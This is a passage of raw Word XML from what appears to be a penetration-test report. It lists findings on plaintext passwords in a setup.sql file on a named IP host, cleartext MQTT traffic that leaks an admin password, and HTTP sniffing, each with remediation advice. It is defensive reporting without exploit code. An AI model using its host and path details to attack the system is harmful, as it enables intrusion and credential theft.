          <w:p w:rsidR="44A9F563" w:rsidP="57C4D39E" w:rsidRDefault="44A9F563" w14:paraId="0504EA4C" w14:textId="32F259AA">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="44A9F563">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>Additional Recommendations</w:t>
            </w:r>
            <w:r w:rsidR="44A9F563">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>: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36A48C8C">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Ensure password complexity and uniqueness such that the passwords cannot be cracked or guessed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="33D97011" w14:textId="59BD903F">
      <w:pPr>
        <w:pStyle w:val="Finding"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="5F9D0E56" w14:textId="3DA2DE38">
      <w:pPr>
        <w:pStyle w:val="Finding"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Unsecured Credentials – 13.40.34.151 (Moderate)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="6287AC67" w14:textId="573CD661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A6CA3C3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9F69DE5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34BBB78" w14:textId="30DC42B9">
            <w:pPr>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Passwords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve">put </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>comments</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="22E24FAF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A96F2A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B8233E0" w14:textId="032F71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color w:val="ED7D31" w:themeColor="accent2" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ED7D31" w:themeColor="accent2" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="06802D8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90584A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254A223" w14:textId="753FB73B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03945DC8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ABE950F" w14:textId="22CD9C87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57C4D39E">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Location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B36B92A" w14:textId="5FA91CB2">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>/root/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>vese</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>-project-dockers/nginx/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>db</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr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i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>setup.sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="5A15B90A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A1ED9A9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42136D45" w14:textId="45B4554C">
            <w:pPr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https://attack.mitre.org/techniques/T1552/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="6CECD0F2" w14:textId="573CD661">
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="73D1E049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Exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Proof</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Concept</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="5CA981C8" w14:textId="573CD661">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The file </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>/root/</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>vese</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>-project-dockers/nginx/</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>setup.sq</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="32A6980E">
        <w:rPr/>
        <w:t>, though accessible only with the root privileges, contains passwords in plaintext next to each user login records:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="32A6980E">
        <w:drawing>
          <wp:inline wp14:editId="451009DA" wp14:anchorId="57548B46">
            <wp:extent cx="4572000" cy="628650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="60115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4170d76cd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D95747F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7B5158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52E6AD4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6484C4E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4BEE8F7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187F5AF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D889BEA" w14:textId="18F57331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3C47415D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0CD6E91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585D7EF" w14:textId="685EFDAB">
            <w:pPr>
              <w:pStyle w:val="Normal"/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57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Remove</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> sensitive comments </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>from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i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>/root/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>vese</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>-project-dockers/nginx/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>db</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>setup.sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="57C4D39E">
              <w:rPr/>
              <w:t xml:space="preserve"> file</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:noSpellErr="1" w14:paraId="3DF48DE8" w14:textId="56561497">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="48566AC2" w14:textId="151DB00D">
            <w:pPr>
              <w:keepNext w:val="1"/>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>dditional</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>R</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>ecommendations</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidR="57C4D39E">
              <w:rPr/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="57C4D39E">
              <w:rPr/>
              <w:t>Check</w:t>
            </w:r>
            <w:r w:rsidR="57C4D39E">
              <w:rPr/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="57C4D39E">
              <w:rPr/>
              <w:t>other</w:t>
            </w:r>
            <w:r w:rsidR="57C4D39E">
              <w:rPr/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="57C4D39E">
              <w:rPr/>
              <w:t>files for sensitive information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="227FB1DE" w14:textId="730552B9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="06DF3B51" w14:textId="573CD661">
      <w:pPr>
        <w:pStyle w:val="Finding"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>MQTT Sniffing – Network (Moderate)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="3F5E9C1E" w14:textId="573CD661">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pP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69DA92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37BDD0A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391E446" w14:textId="0FE15BCF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Sensitive data </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>sent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman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</w:rPr>
              <w:t>with</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> MQTT </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="3723444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778B21C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4F8AA88" w14:textId="4534CA42">
            <w:pPr>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="ED7D31" w:themeColor="accent2" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ED7D31" w:themeColor="accent2" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="060B7ED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1CF6A50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1926BACB" w14:textId="753FB73B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5418720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50CA7D2" w14:textId="06DB6238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57C4D39E">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Location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7EA8640" w14:textId="05A5D09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7C4D39E">
              <w:rPr/>
              <w:t>Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="13885250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A141DF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CA34E32" w14:textId="24DE0558">
            <w:pPr>
              <w:pStyle w:val="Normal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https://attack.mitre.org/techniques/T1040/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="1706D8A3" w14:textId="573CD661">
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="234A587F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Exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Proof</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Concept</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="6E21E904" w14:textId="573CD661">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MQTT applications used in the system send data in plaintext. Attackers can use </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>MiTM</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Man in The Middle attack) or other types of attacks to intercept the traffic and learn user passwords or other sensitive information. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="4FDAE226" w14:textId="573CD661">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Here it leaks system admin password:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="2C1D7F7F" w14:textId="573CD661">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="32A6980E">
        <w:drawing>
          <wp:inline wp14:editId="04524E87" wp14:anchorId="3D2282D9">
            <wp:extent cx="4949164" cy="2020909"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10508481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14baae07a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64" cy="20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51AE531C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29F3B4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D528E89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23A3AAF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1FEAB346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630542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E04D3FA" w14:textId="697D4425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3B93322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773EA1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435C66B" w14:textId="05975BB9">
            <w:pPr>
              <w:pStyle w:val="Normal"/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</w:rPr>
              <w:t xml:space="preserve"> Configure </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>encrypted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communication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between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MQTT </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>applications</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> and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MQTT </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>broker</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Preferably</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> use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newest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TLS 1.3</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> or TLS 1.2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 xml:space="preserve">with </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>strong</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman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</w:rPr>
              <w:t>ciphersuites</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="56DA4A3F" w14:textId="368D2781">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="1A88A23C" w14:textId="573CD661">
      <w:pPr>
        <w:pStyle w:val="Finding"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="32A6980E">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>HTTP Sniffing – Network (Moderate)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="35A69ACA" w14:textId="573CD661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461CF86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3020A37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68F41C4" w14:textId="7FA98B5C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Sensitive data </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>sent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman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</w:rPr>
              <w:t>with</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> HTTP protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="536483DD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99BE5CE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A4892FF" w14:textId="75F9CE92">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="ED7D31" w:themeColor="accent2" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ED7D31" w:themeColor="accent2" w:themeTint="FF" w:themeShade="FF"/>
              </w:rPr>
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="27653A72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170C7A9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4E80F8C9" w14:textId="5A83927E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Ubuntu 22.04.1 LTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="1FC8DB88">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="23A36E29" w:rsidP="57C4D39E" w:rsidRDefault="23A36E29" w14:paraId="5EB4D037" w14:textId="0408FC87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23A36E29">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Location:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="23A36E29" w:rsidP="57C4D39E" w:rsidRDefault="23A36E29" w14:paraId="2936B32D" w14:textId="638F7AF2">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
